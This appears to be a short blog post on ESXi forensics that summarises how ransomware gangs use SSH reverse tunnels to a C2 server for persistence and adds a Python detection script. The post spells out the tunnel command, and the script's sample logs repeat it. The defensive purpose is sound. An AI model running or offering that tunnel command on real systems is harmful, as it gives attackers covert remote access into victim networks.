030. Ransomware Gangs Use SSH Tunneling for Stealthy Persistence in VMware ESXi infrastructure

Hello everyone! Recently Sygnia shared their insights on how ransomware gangs abuse SSH on VMware ESXi hosts for stealthy persistence and how to investigate such activity.


To create a tunnel, the threat actors need no extra tooling; the SSH binary already present on the ESXi host is enough:

ssh -fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>

Here -f sends the client to the background and -N tells it not to run a remote command, so the process just sits there holding the connection open. The -R option is given only a bind address and port (no destination), which in OpenSSH makes the C2 side listen on that port as a SOCKS proxy: whatever the attackers send to it is routed back through the tunnel and out of the ESXi host into the victim network. ESXi hosts are rarely rebooted and often lightly monitored, so such a tunnel can stay up for a long time.

From an incident response and forensics point of view, the following log files are the most interesting:
  • /var/log/shell.log (commands executed in the ESXi shell, including the ssh invocation itself)
  • /var/log/hostd.log (host management agent: service state changes and administrative operations)
  • /var/log/auth.log (SSH authentication attempts, successful logins and sessions)
  • /var/log/vobd.log (VMkernel observation daemon: audit events such as SSH being enabled and firewall rule set changes)
Analysis of these files allows you to reconstruct the whole chain: enabling SSH access, disabling or altering firewall rules, SSH authentication into ESXi, and the tunnel command that followed.
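To show how those four logs come together in an investigation, here is an added example (my own code, not part of the original post or of Sygnia's report): a small Python scanner that runs a handful of indicator rules over lines from shell.log, hostd.log, auth.log and vobd.log, flags SSH enablement, firewall changes, SSH logins and reverse-tunnel commands, and orders the hits into a timeline. The sample log lines are constructed for the example and only modelled on the real formats (the esx.audit.* VOB message IDs, sshd's "Accepted ... for" lines, the [user]: prefix in shell.log); exact field layouts vary between ESXi builds, so treat the regexes as a starting point to tune against your own hosts.

```python
import re
from dataclasses import dataclass

# Constructed sample lines (not from a real incident), modelled on the
# formats of the four ESXi logs discussed above.
SAMPLE_LOGS = {
    "/var/log/vobd.log": [
        "2024-11-02T03:14:05.000Z: [GenericCorrelator] 1234567us: [esx.audit.ssh.enabled] SSH access has been enabled.",
        "2024-11-02T03:14:22.000Z: [UserLevelCorrelator] 1234890us: [esx.audit.net.firewall.config.changed] Firewall configuration has changed. Operation 'disable' for rule set sshServer succeeded.",
        "2024-11-02T03:14:40.000Z: [UserLevelCorrelator] 1235000us: [esx.audit.net.firewall.disabled] Firewall has been disabled.",
    ],
    "/var/log/auth.log": [
        "2024-11-02T03:15:01Z sshd[2101234]: Accepted password for root from 203.0.113.50 port 51422 ssh2",
        "2024-11-02T03:15:01Z sshd[2101234]: Session opened for 'root' on /dev/char/pty/t0",
    ],
    "/var/log/shell.log": [
        "2024-11-02T03:15:30Z In(14) shell[2101240]: [root]: esxcli network firewall get",
        "2024-11-02T03:16:02Z In(14) shell[2101240]: [root]: ssh -fN -R 127.0.0.1:1080 svc@203.0.113.50",
    ],
    "/var/log/hostd.log": [
        "2024-11-02T03:14:05.100Z In(166) Hostd[2100001]: [Originator@6876 sub=Vimsvc.ha-eventmgr] Event 42 : SSH access has been enabled.",
    ],
}

# (log file, pattern, finding label). Patterns are assumptions about the
# message text; adjust them to the ESXi version you are looking at.
RULES = [
    ("/var/log/vobd.log", re.compile(r"esx\.audit\.ssh\.enabled"), "SSH service enabled"),
    ("/var/log/vobd.log", re.compile(r"esx\.audit\.net\.firewall\.(disabled|config\.changed)"), "Firewall disabled or rule set changed"),
    ("/var/log/auth.log", re.compile(r"Accepted (password|publickey) for (\S+) from (\S+)"), "SSH authentication"),
    # An ssh invocation typed in the shell that carries -R/-L/-D/-W or -N:
    # port forwarding or "no command", neither of which a normal admin
    # session on a hypervisor needs.
    ("/var/log/shell.log", re.compile(r"\]: ssh\s.*\s-[A-Za-z]*[RLDWN]\b"), "SSH tunnel command in shell history"),
    ("/var/log/hostd.log", re.compile(r"SSH access has been enabled"), "SSH service enabled (hostd)"),
]

TUNNEL_RE = re.compile(r"-R\s+(\S+)\s+(\S+@\S+)")


@dataclass
class Finding:
    log: str
    label: str
    line: str


def scan_logs(logs):
    """Run every rule over the lines of the log file it applies to."""
    findings = []
    for path, lines in logs.items():
        for line in lines:
            for rule_path, pattern, label in RULES:
                if rule_path == path and pattern.search(line):
                    findings.append(Finding(path, label, line.strip()))
    return findings


def timeline(findings):
    """Order findings by the leading ISO-8601 timestamp (first 19 chars)."""
    return sorted(findings, key=lambda f: f.line[:19])


def tunnel_endpoint(line):
    """For a reverse-tunnel command, return (remote bind spec, user@C2)."""
    m = TUNNEL_RE.search(line)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    for f in timeline(scan_logs(SAMPLE_LOGS)):
        print(f"{f.line[:19]}  {f.label:40}  {f.log}")
        if f.label.startswith("SSH tunnel"):
            print("    tunnel:", tunnel_endpoint(f.line))
```

Run it as-is and the timeline shows the order an investigator wants to confirm: SSH enabled, the sshServer rule set disabled and the firewall switched off, a password login from the C2 address, a reconnaissance esxcli call, and then the ssh -fN -R command whose user@host gives you the C2 endpoint to pivot on in network logs.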

So, if you deal with modern ransomware attacks, being familiar with ESXi forensics is a must!

See you tomorrow!
